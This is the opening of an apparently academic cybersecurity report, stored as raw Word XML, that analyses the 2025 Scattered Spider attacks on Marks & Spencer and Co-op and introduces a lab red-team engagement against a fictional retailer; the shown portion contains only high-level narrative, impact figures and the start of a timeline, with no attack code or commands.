              <w:instrText xml:space="preserve"> PAGEREF _Toc234776740 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14B8608F" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234776741" w:history="1">
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix C — Attack Flow Summary Diagram (described)</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc234776741 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73E8A406" w14:textId="292CF86F" w:rsidR="008A67B1" w:rsidRDefault="00000000" w:rsidP="008A67B1">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00796916">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r w:rsidR="008A67B1">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            </w:rPr>
            <w:tab/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="0" w:name="_Toc234776708" w:displacedByCustomXml="prev"/>
    <w:p w14:paraId="6258FACB" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573F47DE" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591633F7" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C673D0" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F41C095" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24633C24" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1EC5E3" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E67DEE" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDEBA21" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C891F9E" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67505F12" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198C4B70" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712958B7" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D21C3CA" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7BFBBB" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220FD2C5" w14:textId="77777777" w:rsidR="008A67B1" w:rsidRDefault="008A67B1" w:rsidP="008A67B1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B62C065" w14:textId="799837F8" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="383FD516" w14:textId="0E01DFFC" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc234776709"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This report is about two linked aspects of modern offensive security. The first is a threat analysis of the 2025 cyber campaign against Marks &amp; Spencer (M&amp;S) and the Co-operative Group (Co-op), two of the major retailers in the United Kingdom. The campaign was subsequently classed by the UK Cyber Monitoring Centre as a single, systemically important ‘Category 2’ cyber event. The campaign is reconstructed as an evidence-based timeline, mapped against the MITRE ATT&amp;CK® Enterprise Matrix across at least ten tactics and techniques, interrogated for its root causes, threat-actor attribution, detection failures and strategic remediation, based on public reporting, official statements and industry analysis. The report indicates the incident was not the result of a new zero-day vulnerability but a well-understood human and process flaw — IT service-desk identity verification — worsened by poor network segmentation and identity hardening. The second dimension is a professionally constructed red-team engagement against ABCD Ltd, a fictional UK retailer, delivered as a complete penetration-testing package: Rules of Engagement, an MITRE-mapped threat-emulation plan, a three-virtual-machine laboratory design, three distinct exploits constituting an end-to-end attack chain, a technical report including detection-gap analysis, and a board-level executive brief. The two tasks together exhibit conversion of current threat intelligence into ethical, structured, business-focused offensive-security practice.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[3]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1ADDB8B8" w14:textId="77777777" w:rsidR="00796916" w:rsidRDefault="00796916">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0570716E" w14:textId="77777777" w:rsidR="00796916" w:rsidRPr="00796916" w:rsidRDefault="00796916">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE3DF31" w14:textId="6DE9AA86" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1 · Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="71EEB6DA" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Offensive security has moved beyond checklist-driven vulnerability scanning into adversary emulation and red teaming – disciplines that model the tactics, techniques and procedures (TTPs) of real threat actors to test not just whether a vulnerability exists, but whether an organisation can detect, contain and recover from a realistic intrusion. The importance of this change is that the most devastating breaches of the past decade rarely used novel exploits. They have attacked identity, trust and process: a successful phone call to a help desk, a reused credential, a flat network that lets a single foothold become a full-estate breach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA4A840" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The 2025 attacks on M&amp;S and Co-op are a perfect illustration of this reality. Starting with social engineering, rather than malware, the campaign grew into one of the most disruptive retail cyber incidents in British history. The financially motivated collective behind the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ransomware-as-a-service platform, dubbed Scattered Spider, is tracked as UNC3944. It is a perfect case study of the strategic analysis needed for Task 1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[9]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41F0F22A" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc234776710"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, Task 2 employs the same intelligence guided attitude but in a controlled laboratory environment. The engagement is planned, scoped, implemented and reported against a virtualised environment </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">comprised of purposefully susceptible machines, with me engaged as a contracted red-team specialist for the fake ABCD Ltd. All hostile </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> detailed here is limited to an isolated lab, no live system was targeted and all intrusive activity is recorded at an academic level rather than as a weaponised payload, in accordance with the ethical standards of the evaluation. Any assumptions made are explained plainly as they emerge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E8FFE4" w14:textId="4AC9FCB8" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2 · Task 1 — Strategic Threat Analysis: The M&amp;S and Co-op Cyber Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2FADA4D2" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc234776711"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.1 Incident Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4DF2E04D" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Marks &amp; Spencer and the Co-operative Group were both victims of near simultaneous breaches between April and May 2025 which resulted in sustained operational disruption, theft of consumer data and distribution of ransomware. Data was exfiltrated and M&amp;S was obliged to stop online clothes orders for almost six weeks, disable contactless payment and Click &amp; Collect, and ask customers to reset their account passwords. Co-op was hit by huge back-office and logistics disruption and later acknowledged that personal data relating to almost 6.5 million members had been accessed. The UK Cyber Monitoring Centre (CMC) assessed the two events to be a “single combined cyber event” and classified it as a Category 2 systemic incident with an estimated aggregate financial impact of between £270 million and £440 million, on the basis of a single threat actor taking responsibility for both, and the close alignment of timing and TTPs. M&amp;S alone have indicated they anticipate to have an effect on operating profit of around £300m.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[6]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63235CB6" w14:textId="77777777" w:rsidR="00E443CF" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc234776712"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This report considers the two incidents as a single campaign, in line with the CMC’s rationale—shared actor, close timing, and overlapping technique—and highlights where the two victims’ experiences differed (M&amp;S experienced full ransomware encryption of virtual infrastructure; Co-op’s worst impact was extensive data theft and precautionary containment).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[3]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="282C323D" w14:textId="04379387" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.2 Timeline of Key Events</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="42900648" w14:textId="107EF1AA" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E443CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The following timeline is built from publicly available reporting and government statements: Where sources agree on dates these are provided. Where reporting is approximate this is indicated.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
